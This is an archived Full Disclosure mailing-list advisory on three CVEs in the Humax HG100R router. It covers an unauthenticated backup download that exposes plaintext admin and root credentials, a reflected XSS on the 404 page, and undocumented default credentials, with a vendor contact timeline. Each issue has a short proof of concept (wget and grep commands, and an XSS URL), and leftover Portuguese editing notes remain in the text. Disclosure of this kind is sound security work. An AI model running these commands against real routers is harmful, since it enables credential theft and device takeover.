[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Humax Digital HG100R multiple vulnerabilities
From:       The Gambler <gambler () tutanota ! com>
Date:       2017-06-29 21:11:56
Message-ID: KnpgY6y--3-0 () tutanota ! com
[Download RAW message or body]

Humax Digital HG100R multiple vulnerabilities
Device: Humax HG100R
Software Version: VER 2.0.6

- Backup file download (CVE-2017-7315)
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly used by ISPs to \
provide ADSL internet service to household and small business users. (CHECA ESSA INFO) To \
download the backup file it's not required the use of credentials or any authentication, and \
the router credentials are stored in plaintext inside the backup.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 admin
--------------------------------------------------------------------------------

- XSS Reflected(CVE-2017-7316)
An issue was discovered on Humax Digital HG100R 2.0.6 devices. DESCREVE BREVEMENTE O QUE É XSS \
REFLECTED E FALA O QUE PODE FAZER COM O USUÁRIO USANDO ISSO. There is XSS reflected on the 404 \
page.

PoC
http://192.168.0.1<script>alert('XSS')</script>
--------------------------------------------------------------------------------

- Default credentials to router's web application not declared in the manual(CVE-2017-7317) \
NÃO ENTENDI ESSA FRASE. QUE QUIS DIZER? An issue was discovered on Humax Digital HG100 2.0.6 \
devices. The attacker can find the root credentials in the backup file.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 root


Timeline
2017-03-15 - First contact. Ignored by the vendor.
2017-03-21 - Second contact.
2017-03-22 - The vendor answered asking about the vulnerability.
2017-03-27 - Asked the vendor about his security team contact informarion to report the \
vulnerability. 2017-03-28 - The vendor answered saying that it is an old product, and they will \
check this vulnerabilities in the news products. 2017-03-28 - Ask the vendor about a patch.
2017-03-30 - Ask the vendor again about the patch.
2017-04-03 - Notified the vendor about the disclousure after 90 days, even without a patch.
2017-04-19 - Ask the vendor about a patch.
2017-05-08 - Ask the vendor about a patch.
2017-06-29 - Disclosure.


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic